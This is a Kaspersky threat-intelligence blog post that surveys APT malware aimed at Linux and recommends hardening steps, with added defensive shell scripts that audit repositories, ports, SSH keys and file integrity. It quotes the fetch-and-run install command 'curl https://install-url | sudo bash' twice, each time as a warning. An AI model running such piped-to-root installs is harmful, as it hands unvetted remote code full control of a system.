
Perhaps unsurprisingly, a lot has been written about targeted attacks on Windows systems. Windows is, due to its popularity, the platform for which we discover most APT attack tools. At the same time, there's a widely held opinion that Linux is a secure-by-default operating system that isn't susceptible to malicious code. It's certainly true that Linux hasn't faced the deluge of viruses, worms and Trojans faced by those running Windows systems over the years. However, there is certainly malware for Linux – including PHP backdoors, rootkits and exploit code. Moreover, numbers can be misleading. The strategic importance of servers running Linux makes them an attractive target for attackers of all kinds. If an attacker is able to compromise a server running Linux, they not only gain access to data stored on the server but can also target endpoints connected to it running Windows or macOS – for example, through a drive-by download. Furthermore, Linux computers are more likely to be left unprotected, so that such a compromise might well go unnoticed. When the [Heartbleed and Shellshock vulnerabilities](<https://www.kaspersky.com/blog/how-a-linux-bug-may-affect-windows-based-infrastructure/15017/>) were first reported in 2014, two major concerns were that compromised Linux servers could become an attacker's gateway into a corporate network and could give an attacker access to sensitive corporate data.
The Global Research and Analysis Team (GReAT) at Kaspersky publishes regular summaries of advanced persistent threat (APT) activity, based on the threat intelligence research discussed in greater detail in our private APT reports. In this report, we focus on the targeting of Linux resources by APT threat actors.
Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.
## Barium
We first wrote about the [Winnti APT group (aka APT41 or Barium) in 2013](<https://securelist.com/winnti-more-than-just-a-game/37029/>), when they were targeting mostly gaming companies for direct financial profit. Meanwhile, they grew their operations, developed tons of new tools and went for much more complex targets. MESSAGETAP is Linux malware used by this group to selectively intercept SMS messages from the infrastructure of telecoms operators. According to FireEye, the group [deployed this malware on SMS gateway systems as part of its operations to infiltrate ISPs and telecoms companies in order to build a surveillance grid](<https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html>).
Recently, we discovered another suspected Barium/APT41 tool, written in the programming language Go (also known as Golang) that implements a dynamic, C2-controlled packet corruption/network attack tool for Linux machines. Although it's not 100% clear if this is a tool developed for system administration tasks or if it is also part of the APT41 toolset, the fact that the functionality it offers can also be achieved through other system management tools suggests that its purpose may not be legitimate. Also, its name on disk is rather generic and is unrelated to its functionality, again suggesting that it is potentially a covert tool used for carrying out certain types of destructive attacks. More details about this tool can be found in our private report "Suspected Barium network control tool in GO for Linux".
## Cloud Snooper
In February 2020, Sophos published a report describing a set of malicious tools it attributes to a previously unknown threat actor called [Cloud Snooper](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf>). The centerpiece is a server-oriented Linux kernel rootkit that hooks netfilter traffic control functions in order to enable firewall-traversing covert C2 (command-and-control) communications. We analyzed and described the rootkit's userland companion backdoor, dubbed 'Snoopy', and were able to design detection and scanning methods to identify the rootkit at scale. We also discovered more samples, as well as targeted servers in Asia. We believe that this evolved toolset might have been in development since at least 2016.
## Equation
[We uncovered the Equation group in 2015](<https://securelist.com/?s=equation>). This is a highly sophisticated threat actor that has been engaged in multiple CNE (computer network exploitation) operations dating back to 2001, and perhaps as early as 1996. For many years this threat actor interacted or worked together with other powerful APT groups, for projects such as Stuxnet and Flame. The group has a powerful arsenal of implants. Among those we found were: 'EQUATIONLASER', 'EQUATIONDRUG', 'DOUBLEFANTASY', 'TRIPLEFANTASY', 'FANNY' and 'GRAYFISH'. The innovations of the Equation group aren't limited to the Windows platform. The group's POSIX-compliant codebase allows for parallel developments on other platforms. In 2015, we came by the early-stage DOUBLEFANTASY malware for Linux. This implant collects system information and credentials and provides generic access to an infected computer. Given the role this module plays in the infection lifecycle, it would suggest the presence of analogous later-stage, more sophisticated implants, although we weren't able to find any.
![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09130857/sl_overview_of_atps_02.png>)
## HackingTeam
[HackingTeam](<https://securelist.com/spyware-hackingteam/37064/>) was an Italian information technology company that developed and sold intrusion and so-called "legal surveillance software" to governments, law enforcement agencies and businesses around the world. Unfortunately for them, they were hacked and suffered a data breach in 2015, at the hands of the activist known as Phineas Phisher. The subsequent leak of 400GB of stolen company data, including source code and customer information, allowed these tools to be acquired, adapted and used by threat actors around the world, such as DancingSalome (aka Callisto). The leaked tools included a zero-day exploit for Adobe Flash (CVE-2015-5119) as well as sophisticated platforms capable of providing remote access, keylogging, general information recording and exfiltration, and perhaps most notably, the ability to retrieve Skype audio and video frames directly from memory, bypassing stream encryption. The RCS (Remote Control System) malware (aka Galileo, Da Vinci, Korablin, Morcut and Crisis) includes multiple components, including desktop agents for Windows, macOS and perhaps unsurprisingly… Linux.
## Lazarus
In late 2018, we discovered a previously unknown malicious framework that we named [MATA](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>) internally. This framework was used to target commercial companies in Korea, India, Germany and Poland. While we weren't able to find code overlaps with any other known actor, the Kaspersky Threat Attribution engine showed code similarities with Manuscrypt, complex malware used by Lazarus (aka Hidden Cobra). This framework, as with earlier malware developed by Lazarus, included a Windows backdoor. However, we also found a Linux variant that we believe was designed for networking devices.
In June 2020, we analyzed new macOS samples linked to the Lazarus [Operation AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>) and TangoDaiwbo campaigns, used in financial and espionage attacks. The samples had been uploaded to VirusTotal. The uploaded files also included a Linux malware variant that included similar functionality to the macOS TangoDaiwbo malware. These samples confirm a development that we had highlighted two years earlier – that the group was actively developing non-Windows malware.
## Sofacy
[Sofacy](<https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/>) (aka APT28, Fancy Bear, STRONTIUM, Sednit and Tsar Team) is a highly active and prolific APT threat actor. From its high-volume zero-day deployment to its innovative, broad malware set, Sofacy is one of the top groups that we monitor. Among the tools in the group's arsenal is SPLM (also known as CHOPSTICK and XAgent), a second-stage tool used selectively against targets around the world. Over the years, Sofacy has developed modules for several platforms, including, in 2016, modules for Linux, detected as 'Fysbis'. The consistent artefacts seen over the years and across Windows, macOS, iOS and Linux suggest that the same developers, or a small core team, are modifying and maintaining the code.
## The Dukes
The [Dukes is a sophisticated threat actor that was first documented by us in 2013](<https://securelist.com/the-miniduke-mystery-pdf-0-day-government-spy-assembler-0x29a-micro-backdoor/31112/>), but whose tools have been used in attacks dating back to 2008. The group is responsible for attacks against targets in Chechnya, Ukraine, Georgia, as well as western governments and NGOs, NATO and individuals – the group is thought to be behind the hack of the Democratic National Congress in 2016. The Dukes' toolset includes a comprehensive set of malware implementing similar functionality but coded in several different programming languages. The group's malware and campaigns include PinchDuke, GeminiDuke, CosmicDuke, MiniDuke, CozyDuke, OnionDuke, SeaDuke, HammerDuke and CloudDuke. At least one of these, SeaDuke, includes a Linux variant.
## The Lamberts
The Lamberts is a highly sophisticated threat actor group which is known to possess a huge malware arsenal, including passive, network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a color scheme to distinguish the various tools and implants used against different victims around the world.
![Lamberts discovery timeline](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131046/sl_overview_of_atps_03.png>)
**_Lamberts discovery timeline_**
In 2017, we published an [overview of the Lamberts family](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>); and further updates (GoldLambert, SilverLambert, RedLambert, BrownLambert) are available to customers of our [threat intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). The focus of the various Lamberts variants is definitely Windows. Nevertheless, signatures that we created for Green Lambert for Windows also triggered on a macOS variant of Green Lambert that was functionally similar to the Windows version. In addition, we also identified samples of the SilverLambert backdoor compiled for both Windows and Linux.
## Tsunami backdoor
Tsunami (aka Kaiten) is a UNIX backdoor used by multiple threat actors since it was first seen in the wild in 2002. The source code was made public some years ago; and there are now more than 70 variants. The source code compiles smoothly on a wide range of embedded devices; and there are versions for ARM, MIPS, Sparc and Cisco 4500/PowerPC. Tsunami remains a threat for Linux-based routers, DVRs and the increasing number of IoT (internet of things) devices. In 2016, a variant of Tsunami was used in the [Linux Mint hack](<https://securelist.com/beware-of-backdoored-linux-mint-isos/73893/>), where an unknown threat actor compromised the Linux Mint distribution ISOs to include a backdoor. We also observed the use of the Tsunami backdoor to surgically target a number of cryptocurrency users on Linux.
## Turla
Turla (aka Uroboros, Venomous Bear and Waterbug) is a prolific Russian-speaking group known for its covert exfiltration tactics such as the use of [hijacked satellite connections](<https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/>), [water-holing of government websites](<https://securelist.com/the-epic-turla-operation/65545/>), covert channel backdoors, rootkits and [deception tactics](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07184135/Bartholomew-GuerreroSaade-VB2016.pdf>). This threat actor, like other APT groups, has made significant changes to its toolset over the years. Until 2014, every malware sample used by Turla that we had seen was designed for 32- or 64-bit versions of Windows.
![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131207/sl_overview_of_atps_04.jpg>)
Then in December 2014, we published our report on [Penguin Turla](<https://securelist.com/the-penquin-turla-2/67962/>), a Linux component in the Turla arsenal. This is a stealth backdoor that didn't require elevated privileges, i.e. administrator or root rights. Even if someone with limited access to the system launches it, the backdoor can intercept incoming packets and run commands from the attackers on the system while maintaining stealth. It is also rather hard to uncover, so if it's installed on a compromised server, it could sit there unnoticed for a long time. Further research on Penguin Turla revealed that [its roots stretch back to the Moonlight Maze operation in the mid-1990s](<https://securelist.com/penquins-moonlit-maze/77883/>). In May this year, researchers from Leonardo published a report about [Penguin_x64](<https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf/541d279e-a827-38b4-99e8-3c23553cd66a>), a previously undocumented variant of the Penguin Turla Linux backdoor. Based on this report, we generated network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover a couple dozen infected servers in Europe and the US, as recently as July 2020. We believe that, following public documentation of GNU/Linux tools, Turla may have been repurposing Penguin to conduct operations other than traditional intelligence gathering.
## Two-Sail Junk
In January 2020, a watering hole was discovered that utilized a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. For the time being, until we can link the campaign to a known group, we have given the name Two-Sail Junk to the threat actor behind this implant. However, while [our public report](<https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/>) focused on the iOS implant, the project is broader than previously thought, supporting an Android implant, and probably supporting implants for Windows, Linux and macOS.
## WellMess
In March 2020, we began to actively track new C2 servers associated with malware commonly referred to as WellMess, indicating a potentially massive new wave of activity. This malware was [initially documented by JPCERT in July 2018](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) and has been sporadically active since then. There were rumors that hint at a possible connection with CozyDuke (aka APT29), along with speculation that the current activity was focused on the healthcare industry, although we were unable to verify either claim. WellMess is a Remote Access Trojan, written in .NET and Go (Golang), cross-compiled to be compatible with both Windows and Linux.
## WildNeutron
We [first published about WildNeutron in 2015](<https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/>), together with our colleagues from Symantec, who call it Morpho or Butterfly. This group, which rose to prominence with their 2012-2013 attacks on Twitter, Microsoft, Apple and Facebook, are one of the most elusive, mysterious and dynamic we have seen. Their arsenal included many interesting and innovative tools, such as LSA backdoors or IIS plugins, coupled with both zero-day-based and physical deployment. Unsurprisingly, in several known attacks WildNeutron used a custom Linux backdoor as well.
## Zebrocy
Zebrocy is custom malware that we have been tracking since 2015. The group using this malware started as a subset of Sofacy, but also has similarities and [overlaps with other APT groups](<https://securelist.com/zebrocys-multilanguage-malware-salad/90680/>). The group has developed malware in several languages, including Delphi, AutoIT, .NET, C#, PowerShell and Go. Zebrocy has mainly targeted Central Asian government-related organizations, both in-country and in remote locations. The group makes extensive use of spear phishing to compromise Windows endpoints. However, its backdoors are configured to communicate directly with IP-assigned web server hosts over port 80; and [the group seems to favor Linux for this part of its infrastructure](<https://securelist.com/a-zebrocy-go-downloader/89419/>) – specifically, Apache 2.4.10 running on Debian Linux.
![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131351/sl_overview_of_atps_05.png>)
## Recommendations for protecting Linux systems
One of the main reasons that Linux systems go unprotected is a false sense of security from using Linux instead of the far more popular (and more targeted) Windows. Nevertheless, we hope all the aforementioned points are convincing enough for you to start securing your Linux-based machines in a serious way.
The very first recommendation is to **maintain a list of trusted sources** of your software. Think about this in the same way as the recommended approach to Android or iOS apps – only installing applications from official repositories. In the Linux world we enjoy more freedom: for example, even if you are using Ubuntu, you're not restricted only to Canonical's own repository. Any .DEB file, or even application source code from GitHub, is at your service. But please choose these sources wisely. Don't just blindly follow instructions like "Run this script from our server to install"; or "curl https://install-url | sudo bash" – which is a security nightmare.
Please also be mindful of the **secure way to get applications** from these trusted repositories. Your channels to update the apps have to be encrypted using HTTPS or SSH protocols. Besides your trust in software sources and its delivery channel, it's critical for **updates to arrive in a timely fashion**. Most modern Linux flavors are able to do this for you, but a simple cron script would help you to stay more protected and to get all the patches as soon as they are released by developers.
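As an added example (not code from the Securelist article), the following POSIX shell script checks a sources.list-style file for repository entries that are fetched over plain http:// or ftp:// rather than https://, which is the "unencrypted update channel" the recommendation warns about. The sample sources file it scans is constructed here.

```shell
#!/bin/sh
# Added example, not from the original article: audit apt repository entries
# for unencrypted transports. The sample sources file is constructed below.

# Print every active "deb"/"deb-src" entry whose URI uses http:// or ftp://.
# Commented-out lines are ignored; an optional "[arch=amd64 ...]" option
# block before the URI is skipped over.
find_unencrypted_sources() {
    grep -E '^[[:space:]]*deb(-src)?[[:space:]]' "$1" |
        awk '{
            uri = $2
            if (uri ~ /^\[/) {
                for (i = 2; i <= NF; i++) if ($i ~ /\]$/) { uri = $(i + 1); break }
            }
            if (uri ~ /^(http|ftp):\/\//) print
        }'
}

# Number of such entries (0 means every active repository uses https://).
count_unencrypted_sources() {
    find_unencrypted_sources "$1" | awk 'END { print NR }'
}

# Constructed sample: a mix of encrypted and unencrypted repository lines.
SAMPLE_SOURCES=$(mktemp)
trap 'rm -f "$SAMPLE_SOURCES"' EXIT
cat > "$SAMPLE_SOURCES" <<'EOF'
# constructed sources.list for this example
deb https://deb.debian.org/debian bullseye main
deb http://mirror.example.internal/debian bullseye main
deb [arch=amd64] http://third-party.example/repo stable main
deb-src https://deb.debian.org/debian bullseye main
deb ftp://old-mirror.example/debian bullseye main
EOF

echo "Repository entries fetched over an unencrypted channel:"
find_unencrypted_sources "$SAMPLE_SOURCES"
echo "Count: $(count_unencrypted_sources "$SAMPLE_SOURCES")"
```

On a real host, run `find_unencrypted_sources` over `/etc/apt/sources.list` and each `.list` file in `/etc/apt/sources.list.d/`; the newer Deb822-style `.sources` files (with a `URIs:` field) are not parsed by this one-line-per-entry check. For the "timely updates" point, Debian and Ubuntu ship the `unattended-upgrades` package, which covers the cron-driven patching the paragraph describes.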
The next thing we would recommend is checking network-related settings. With commands like "netstat -a" you could **filter out all unnecessary opened ports** on your host. Please avoid network applications you really don't need or don't use, to minimize your network footprint. We would also strongly recommend that you **properly set up the firewall** from your Linux distribution, to filter traffic and log the host's network activity. It's also a very good idea not to go online directly, but through NAT.
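The port review described above, as an added example that is not part of the original article: a POSIX shell filter over `ss -ltn` (or `netstat -tln`) output that lists the TCP ports bound to every interface and reports the ones missing from an allowlist of services you actually intend to expose. The socket listing it parses is constructed here.

```shell
#!/bin/sh
# Added example, not from the original article: find listening TCP ports that
# are exposed on all interfaces, then report those missing from an allowlist.
# The "ss -ltn" output below is constructed for the example.

# Read "ss -ltn" or "netstat -tln" output on stdin (the local address is the
# fourth column in both layouts); print, once each and numerically sorted, the
# ports bound to a wildcard address. Loopback-only services (127.0.0.1, ::1)
# are not reachable from the network and are skipped.
exposed_ports() {
    awk '($1 == "LISTEN" || $NF == "LISTEN") {
        n = split($4, a, ":"); port = a[n]
        addr = substr($4, 1, length($4) - length(port) - 1)
        if (addr == "0.0.0.0" || addr == "*" || addr == "[::]" || addr == "::") print port
    }' | sort -un
}

# $1 = space-separated allowlist; prints exposed ports that are not on it.
unexpected_ports() {
    allow=" $1 "
    exposed_ports | while read -r port; do
        case "$allow" in
            *" $port "*) ;;
            *) echo "$port" ;;
        esac
    done
}

# Constructed sample in the layout printed by "ss -ltn".
SAMPLE_SS='State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       128     127.0.0.1:631       0.0.0.0:*
LISTEN  0       4096    *:80                *:*
LISTEN  0       128     [::]:22             [::]:*
LISTEN  0       80      127.0.0.1:3306      0.0.0.0:*'

echo "Exposed TCP ports:"
printf '%s\n' "$SAMPLE_SS" | exposed_ports
echo "Exposed but not on the allowlist (22 443):"
printf '%s\n' "$SAMPLE_SS" | unexpected_ports "22 443"
```

On a live system the pipeline is `ss -ltn | unexpected_ports "22 443"`; anything it prints is either a service to remove or a port to block at the firewall. UDP listeners (`ss -lun`) show state `UNCONN` rather than `LISTEN`, so the awk condition would need extending to cover them.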
To continue with the network-related security rules, we recommend **protecting your locally stored SSH keys** (used for your network services) with passphrases at least. In more "paranoid" mode you could even **store the keys on external protected storage**, like tokens from any trusted vendor. On the server side of connections, nowadays it's not that hard to **set up multi-factor authentication for SSH sessions**, using mechanisms such as messages to your phone or authenticator apps.
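One way to check the first recommendation above, as an added example that is not the article's own code: a POSIX shell script that scans a directory for SSH private keys saved without a passphrase. It relies on two stable properties of the key file formats: a legacy PEM key is encrypted only when it carries a `Proc-Type: 4,ENCRYPTED` header, and a new-format OpenSSH key stores its cipher name right after the `openssh-key-v1` magic, so an unencrypted one (cipher `none`) always starts with the same base64 prefix. The key files it scans are constructed stand-ins with truncated bodies, not real keys.

```shell
#!/bin/sh
# Added example, not from the original article: find SSH private keys stored
# without a passphrase. The key files below are constructed stand-ins (headers
# plus a truncated body), not usable keys.

# Exit 0 if the key at $1 is passphrase-protected, 1 if it is stored in the
# clear, 2 if the file is not a recognised private key.
ssh_key_is_encrypted() {
    first=$(head -n 1 "$1")
    case "$first" in
        '-----BEGIN OPENSSH PRIVATE KEY-----')
            # New OpenSSH format: the base64 body encodes "openssh-key-v1\0"
            # followed by the cipher name. A key saved without a passphrase
            # uses cipher "none", which always yields this fixed prefix.
            second=$(sed -n 2p "$1")
            case "$second" in
                b3BlbnNzaC1rZXktdjEAAAAABG5vbmU*) return 1 ;;
                *) return 0 ;;
            esac ;;
        '-----BEGIN ENCRYPTED PRIVATE KEY-----')
            return 0 ;;   # PKCS#8, encrypted by definition
        '-----BEGIN '*' PRIVATE KEY-----'|'-----BEGIN PRIVATE KEY-----')
            # Legacy PEM (RSA/EC/DSA) keys carry a Proc-Type header when
            # encrypted; an unencrypted PKCS#8 "BEGIN PRIVATE KEY" never does.
            grep -q '^Proc-Type: 4,ENCRYPTED' "$1" ;;
        *)
            return 2 ;;
    esac
}

# Print the path of every private key directly under directory $1 that has
# no passphrase; public keys and other files are skipped.
list_unencrypted_keys() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        head -n 1 "$f" | grep -q 'PRIVATE KEY-----$' || continue
        ssh_key_is_encrypted "$f" && continue
        [ $? -eq 1 ] && echo "$f"
    done
    return 0
}

# Constructed sample key directory (bodies are truncated placeholders).
KEYDIR=$(mktemp -d)
trap 'rm -rf "$KEYDIR"' EXIT
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
    'b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAA' \
    '-----END OPENSSH PRIVATE KEY-----' > "$KEYDIR/id_ed25519_nopass"
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
    'b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAA' \
    '-----END OPENSSH PRIVATE KEY-----' > "$KEYDIR/id_ed25519_pass"
printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
    'DEK-Info: AES-128-CBC,00000000000000000000000000000000' '' 'AAAA' \
    '-----END RSA PRIVATE KEY-----' > "$KEYDIR/id_rsa_legacy_pass"
printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'AAAA' \
    '-----END RSA PRIVATE KEY-----' > "$KEYDIR/id_rsa_legacy_nopass"
printf 'ssh-ed25519 AAAA comment\n' > "$KEYDIR/id_ed25519_nopass.pub"

echo "Private keys stored without a passphrase:"
list_unencrypted_keys "$KEYDIR"
```

Run `list_unencrypted_keys ~/.ssh` for each user account; a key it reports can be given a passphrase in place with `ssh-keygen -p -f <keyfile>`. The check only reads the first two lines of each file, so it is safe to run over a directory of real keys.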
So far, our recommendations have covered software sources, application delivery channel, avoiding unnecessary network footprint and protection of encryption keys. One more idea we recommend for monitoring threats you couldn't find at the filesystem level is to **keep and analyze the network activity logs**. You could install and use an out-of-band network tap to independently monitor and analyze the network communications of your Linux systems.
As part of your threat model, you need to consider the possibility that, despite all the aforementioned measures, attackers can compromise your protection. Think about the next protection step in terms of an attacker's persistence in the system. They will probably make changes to be able to start their Trojan automatically after the system reboots. So, you need to **regularly monitor the main configuration files as well as the integrity of system binaries**, in case of file-infecting viruses. The logging approach mentioned above for network communication is fully applicable here: **the Linux auditing system collects system calls and file access records**. Additional daemons such as "osquery" can be used for the same task. Any suspicious files, URLs and IP addresses can be checked at the [Kaspersky Threat Intelligence Portal](<https://opentip.kaspersky.com/>).
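The configuration and binary integrity monitoring recommended above, as an added example that is not from the article: a minimal POSIX shell baseline-and-compare tool built on `sha256sum` from GNU coreutils. It records a hash for every file under a directory, then reports files that were added, modified or removed since the baseline, which is exactly the footprint a reboot-persistence change leaves in places like `/etc`. The directory tree it checks is constructed here.

```shell
#!/bin/sh
# Added example, not from the original article: a minimal file-integrity
# baseline for configuration directories and system binaries, built on
# sha256sum from GNU coreutils. The directory tree below is constructed.

# Record "hash  ./relative/path" for every regular file under $1 into $2,
# sorted by path so two baselines of the same tree are directly comparable.
# (Paths containing whitespace are not handled by the comparison below.)
make_baseline() {
    (cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k2) > "$2"
}

# Compare directory $1 against baseline $2; print one line per difference as
# "ADDED|MODIFIED|REMOVED path", sorted, and nothing when the tree is intact.
check_integrity() {
    current=$(mktemp)
    make_baseline "$1" "$current"
    awk 'FILENAME == ARGV[1] { base[$2] = $1; next }
         { cur[$2] = $1 }
         END {
             for (p in base) if (!(p in cur)) print "REMOVED " p
             for (p in cur)
                 if (!(p in base))           print "ADDED " p
                 else if (cur[p] != base[p]) print "MODIFIED " p
         }' "$2" "$current" | LC_ALL=C sort
    rm -f "$current"
}

# Constructed tree standing in for /etc and a binaries directory.
DEMO=$(mktemp -d)
BASELINE=$(mktemp)
trap 'rm -rf "$DEMO" "$BASELINE"' EXIT
mkdir -p "$DEMO/bin"
printf 'PermitRootLogin no\n' > "$DEMO/sshd_config"
printf '0 3 * * * /usr/bin/apt-get update\n' > "$DEMO/crontab"
printf 'not-a-real-binary\n' > "$DEMO/bin/ls"

make_baseline "$DEMO" "$BASELINE"

# Simulate the kind of changes a persistence attempt leaves behind: an edited
# crontab, a new boot-time script, and a system binary that is no longer the
# file recorded in the baseline.
printf '@reboot /tmp/unexpected-service\n' >> "$DEMO/crontab"
printf '#!/bin/sh\n' > "$DEMO/rc.local"
rm "$DEMO/bin/ls"

echo "Changes since baseline:"
check_integrity "$DEMO" "$BASELINE"
```

Keep the baseline file somewhere the monitored host cannot rewrite it (read-only media or another system), since an attacker with root can otherwise update it along with the files. For real-time records rather than periodic comparison, the audit subsystem mentioned in the paragraph can watch the same paths; for example, `auditctl -w /etc -p wa -k etc_changes` logs every write or attribute change under `/etc` with the key `etc_changes` for later searching.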
Physical security of devices is also important. It doesn't matter how much attention you pay to network and system level hardening if your laptop ends up in an attacker's hands and you haven't taken steps to protect it from this attack vector. You should consider **full disk encryption and safe boot mechanisms** for physical security. A more spy-like approach would be to place tamper-evident security tape on your most critical hardware.
A dedicated [solution](<https://www.kaspersky.com/enterprise-security/endpoint>) with Linux security can simplify the protection task: web threat protection detects malicious and phishing websites; network threat protection detects network attacks in incoming traffic; behavior analysis detects malicious activity; and device control allows management of connected devices and access to them.
Our final recommendation relates to Docker. This is not a theoretical threat: infection of containers is a [very real issue](<https://www.zdnet.com/article/new-linux-malware-uses-dogecoin-api-to-find-c-c-server-addresses/?amp=1>). **Containerization doesn't provide security by itself**. Some containers are quite isolated from the host, but not all – **network and file system interfaces exist** in them and in most cases there are bridges between physical and containerized worlds.
Therefore, you can use a security solution that lets you add security into the development process. [Kaspersky Hybrid Cloud Security](<https://www.kaspersky.com/enterprise-security/devops-security>) includes integration with CI/CD platforms, such as Jenkins, through a script that scans Docker images for malicious elements at different stages.
To prevent supply-chain attacks, On-Access Scanning (OAS) and On-Demand Scanning (ODS) of containers, images, and local and remote repositories can be used. Namespace monitoring, flexible mask-based scan scope control and the ability to scan different layers of containers help to enforce secure development best practices.
We have broken down this list of recommendations into logical sections. Please bear in mind that, besides applying all the measures we have mentioned, you should also audit and check all the generated logs and any other messages regularly. Otherwise you could miss signs of intrusion. A final idea, for security enthusiasts, is to adopt active measures – to provide system penetration testing from time to time.
### Summary of recommendations:
* Maintain a list of trusted software sources, avoid using unencrypted update channels.
* Do not run binaries and scripts from untrusted sources. A widely advertised way to install programs with commands like "curl https://install-url | sudo bash" is a security nightmare.
* Make sure your update procedure is effective. Set up automatic security updates.
* Spend time to set up your firewall properly: make sure it logs network activity, block all ports you don't use, minimize your network footprint.
* Use key-based SSH authentication, protect keys with passwords.
* Use 2FA and store sensitive keys on external token devices (e.g. Yubikey).
* Use an out-of-band network tap to independently monitor and analyze network communications of your Linux systems.
* Maintain system executable file integrity. Review configuration file changes regularly.
* Be prepared for insider/physical attacks: use full disk encryption, trusted/safe boot and put tamper-evident security tape on your critical hardware.
* Audit the system, check logs for indicators of attacks.
* Run penetration tests on your Linux setup.
* Use a dedicated security solution for Linux with web and network protection, as well as features for DevOps protection.
{"id": "SECURELIST:DA2F9F352C039B19A1FF5741AA1AA7C4", "type": "securelist", "bulletinFamily": "blog", "title": "An overview of targeted attacks and APTs on Linux", "description": "\n\nPerhaps unsurprisingly, a lot has been written about targeted attacks on Windows systems. Windows is, due to its popularity, the platform for which we discover most APT attack tools. At the same time, there's a widely held opinion that Linux is a secure-by-default operating system that isn't susceptible to malicious code. It's certainly true that Linux hasn't faced the deluge of viruses, worms and Trojans faced by those running Windows systems over the years. However, there is certainly malware for Linux \u2013 including PHP backdoors, rootkits and exploit code. Moreover, numbers can be misleading. The strategic importance of servers running Linux makes them an attractive target for attackers of all kinds. If an attacker is able to compromise a server running Linux, they not only gain access to data stored on the server but can also target endpoints connected to it running Windows or macOS \u2013 for example, through a drive-by download. Furthermore, Linux computers are more likely to be left unprotected, so that such a compromise might well go unnoticed. When the[ Heartbleed and Shellshock vulnerabilities](<https://www.kaspersky.com/blog/how-a-linux-bug-may-affect-windows-based-infrastructure/15017/>) were first reported in 2014, two major concerns were that compromised Linux servers could become an attacker's gateway into a corporate network and could give an attacker access to sensitive corporate data.\n\nThe Global Research and Analysis Team (GReAT) at Kaspersky publishes regular summaries of advanced persistent threat (APT) activity, based on the threat intelligence research discussed in greater detail in our private APT reports. 
In this report, we focus on the targeting of Linux resources by APT threat actors.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## Barium\n\nWe first wrote about the [Winnti APT group (aka APT41 or Barium) in 2013](<https://securelist.com/winnti-more-than-just-a-game/37029/>), when they were targeting mostly gaming companies for direct financial profit. Meanwhile, they grew their operations, developed tons of new tools and went for much more complex targets. MESSAGETAP is Linux malware used by this group to selectively intercept SMS messages from the infrastructure of telecoms operators. According to FireEye, the group[ deployed this malware on SMS gateway systems as part of its operations to infiltrate ISPs and telecoms companies in order to build a surveillance grid](<https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html>).\n\nRecently, we discovered another suspected Barium/APT41 tool, written in the programming language Go (also known as Golang) that implements a dynamic, C2-controlled packet corruption/network attack tool for Linux machines. Although it's not 100% clear if this is a tool developed for system administration tasks or if it is also part of the APT41 toolset, the fact that the functionality it offers can also be achieved through other system management tools suggests that its purpose may not be legitimate. Also, its name on disk is rather generic and is unrelated to its functionality, again suggesting that it is potentially a covert tool used for carrying out certain types of destructive attacks. 
More details about this tool can be found in our private report "Suspected Barium network control tool in GO for Linux".\n\n## Cloud Snooper\n\nIn February 2020, Sophos published a report describing a set of malicious tools it attributes to a previously unknown threat actor called [Cloud Snooper](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf>). The centerpiece is a server-oriented Linux kernel rootkit that hooks netfilter traffic control functions in order to enable firewall-traversing covert C2 (command-and-control) communications. We analyzed and described the rootkit's userland companion backdoor, dubbed 'Snoopy', and were able to design detection and scanning methods to identify the rootkit at scale. We also discovered more samples, as well as targeted servers in Asia. We believe that this evolved toolset might have been in development since at least 2016.\n\n## Equation\n\n[We uncovered the Equation group in 2015](<https://securelist.com/?s=equation>). This is a highly sophisticated threat actor that has been engaged in multiple CNE (computer network exploitation) operations dating back to 2001, and perhaps as early as 1996. For many years this threat actor interacted or worked together with other powerful APT groups, for projects such as Stuxnet and Flame. The group has a powerful arsenal of implants. Among those we found were: 'EQUATIONLASER', 'EQUATIONDRUG', 'DOUBLEFANTASY', 'TRIPLEFANTASY', 'FANNY' and 'GRAYFISH'. The innovations of the Equation group aren't limited to the Windows platform. The group's POSIX-compliant codebase allows for parallel developments on other platforms. In 2015, we came by the early-stage DOUBLEFANTASY malware for Linux. This implant collects system information and credentials and provides generic access to an infected computer. 
